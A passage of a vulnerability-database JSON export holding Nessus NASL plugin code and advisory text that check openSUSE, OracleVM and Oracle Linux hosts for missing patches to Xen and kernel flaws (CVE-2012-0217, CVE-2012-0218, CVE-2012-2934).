"2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:xen-doc-html", "p-cpe:/a:novell:opensuse:xen-devel", "p-cpe:/a:novell:opensuse:xen-kmp-desktop", "p-cpe:/a:novell:opensuse:xen-kmp-pae", "p-cpe:/a:novell:opensuse:xen", "p-cpe:/a:novell:opensuse:xen-tools-debuginfo", "p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo", "cpe:/o:novell:opensuse:11.4", "p-cpe:/a:novell:opensuse:xen-doc-pdf", "p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs", "p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo", "p-cpe:/a:novell:opensuse:xen-debugsource", "p-cpe:/a:novell:opensuse:xen-tools", "p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:xen-tools-domU", "p-cpe:/a:novell:opensuse:xen-kmp-default"], "id": "OPENSUSE-2012-404.NASL", "href": "https://www.tenable.com/plugins/nessus/74683", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-404.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74683);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-0029\", \"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n\n script_name(english:\"openSUSE Security Update : xen (openSUSE-2012-404)\");\n script_summary(english:\"Check for the openSUSE-2012-404 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of XEN fixed multiple security flaws that could be\nexploited by local attackers to cause a Denial of Service or\npotentially escalate privileges. Additionally, several other upstream\nchanges were backported.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=649209\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=683580\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=691256\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=694863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=701686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=704160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=706106\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=706574\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=708025\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=712051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=712823\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=714183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=715655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=716695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=725169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=726332\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=727515\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=732782\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=734826\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=736824\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=739585\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=740165\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=746702\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757537\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=764077\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-debugsource-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-devel-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-doc-html-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-doc-pdf-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-default-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-default-debuginfo-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-desktop-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-desktop-debuginfo-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-pae-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-pae-debuginfo-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-libs-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-libs-debuginfo-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-tools-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-tools-debuginfo-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-tools-domU-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-tools-domU-debuginfo-4.0.3_04-42.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-debugsource / xen-devel / xen-doc-html / xen-doc-pdf / etc\");\n}\n", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T13:23:10", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2012-0217 CVE-2012-0218: guest DoS on\n syscall/sysenter exception generation [orabug 13993157]", "edition": 29, "published": "2014-11-26T00:00:00", "title": "OracleVM 2.2 : xen (OVMSA-2012-0022)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218"], "modified": "2014-11-26T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:xen-64", "p-cpe:/a:oracle:vm:xen-devel", "p-cpe:/a:oracle:vm:xen-debugger", "cpe:/o:oracle:vm_server:2.2", "p-cpe:/a:oracle:vm:xen-pvhvm-devel", "p-cpe:/a:oracle:vm:xen", "p-cpe:/a:oracle:vm:xen-tools"], "id": "ORACLEVM_OVMSA-2012-0022.NASL", "href": "https://www.tenable.com/plugins/nessus/79478", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2012-0022.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79478);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\");\n script_bugtraq_id(53856, 53955);\n\n script_name(english:\"OracleVM 2.2 : xen (OVMSA-2012-0022)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2012-0217 CVE-2012-0218: guest DoS on\n syscall/sysenter exception generation [orabug 13993157]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2012-June/000084.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-debugger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-pvhvm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:2.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"2\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 2.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-64-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-debugger-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-devel-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-pvhvm-devel-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-tools-3.4.0-0.1.39.el5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-64 / xen-debugger / xen-devel / xen-pvhvm-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:46:58", "description": "From Red Hat Security Advisory 2012:0721 :\n\nUpdated kernel packages that fix two security issues are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* It was found that the Xen hypervisor implementation as shipped with\nRed Hat Enterprise Linux 5 did not properly restrict the syscall\nreturn addresses in the sysret return path to canonical addresses. An\nunprivileged user in a 64-bit para-virtualized guest, that is running\non a 64-bit host that has an Intel CPU, could use this flaw to crash\nthe host or, potentially, escalate their privileges, allowing them to\nexecute arbitrary code at the hypervisor level. (CVE-2012-0217,\nImportant)\n\n* It was found that guests could trigger a bug in earlier AMD CPUs,\nleading to a CPU hard lockup, when running on the Xen hypervisor\nimplementation. An unprivileged user in a 64-bit para-virtualized\nguest could use this flaw to crash the host. Warning: After installing\nthis update, hosts that are using an affected AMD CPU (refer to Red\nHat Bugzilla bug #824966 for a list) will fail to boot. In order to\nboot such hosts, the new kernel parameter, allow_unsafe, can be used\n('allow_unsafe=on'). This option should only be used with hosts that\nare running trusted guests, as setting it to 'on' reintroduces the\nflaw (allowing guests to crash the host). (CVE-2012-2934, Moderate)\n\nNote: For Red Hat Enterprise Linux guests, only privileged guest users\ncan exploit the CVE-2012-0217 and CVE-2012-2934 issues.\n\nRed Hat would like to thank the Xen project for reporting these\nissues. Upstream acknowledges Rafal Wojtczuk as the original reporter\nof CVE-2012-0217.\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.", "edition": 23, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : kernel (ELSA-2012-0721-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-PAE", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:kernel-xen-devel", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-PAE-devel", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-xen"], "id": "ORACLELINUX_ELSA-2012-0721-1.NASL", "href": "https://www.tenable.com/plugins/nessus/68539", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0721 and \n# Oracle Linux Security Advisory ELSA-2012-0721-1 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68539);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-2934\");\n script_bugtraq_id(53856, 53961);\n script_xref(name:\"RHSA\", value:\"2012:0721\");\n\n script_name(english:\"Oracle Linux 5 : kernel (ELSA-2012-0721-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0721 :\n\nUpdated kernel packages that fix two security issues are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* It was found that the Xen hypervisor implementation as shipped with\nRed Hat Enterprise Linux 5 did not properly restrict the syscall\nreturn addresses in the sysret return path to canonical addresses. An\nunprivileged user in a 64-bit para-virtualized guest, that is running\non a 64-bit host that has an Intel CPU, could use this flaw to crash\nthe host or, potentially, escalate their privileges, allowing them to\nexecute arbitrary code at the hypervisor level. (CVE-2012-0217,\nImportant)\n\n* It was found that guests could trigger a bug in earlier AMD CPUs,\nleading to a CPU hard lockup, when running on the Xen hypervisor\nimplementation. An unprivileged user in a 64-bit para-virtualized\nguest could use this flaw to crash the host. Warning: After installing\nthis update, hosts that are using an affected AMD CPU (refer to Red\nHat Bugzilla bug #824966 for a list) will fail to boot. In order to\nboot such hosts, the new kernel parameter, allow_unsafe, can be used\n('allow_unsafe=on'). This option should only be used with hosts that\nare running trusted guests, as setting it to 'on' reintroduces the\nflaw (allowing guests to crash the host). (CVE-2012-2934, Moderate)\n\nNote: For Red Hat Enterprise Linux guests, only privileged guest users\ncan exploit the CVE-2012-0217 and CVE-2012-2934 issues.\n\nRed Hat would like to thank the Xen project for reporting these\nissues. Upstream acknowledges Rafal Wojtczuk as the original reporter\nof CVE-2012-0217.\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-June/002865.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-2.6.18-308.8.2.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-308.8.2.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-devel-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-308.8.2.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-2.6.18-308.8.2.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-devel-2.6.18-308.8.2.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-devel-2.6.18-308.8.2.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-doc-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-doc-2.6.18-308.8.2.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-headers-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-headers-2.6.18-308.8.2.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-2.6.18-308.8.2.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-devel-2.6.18\") 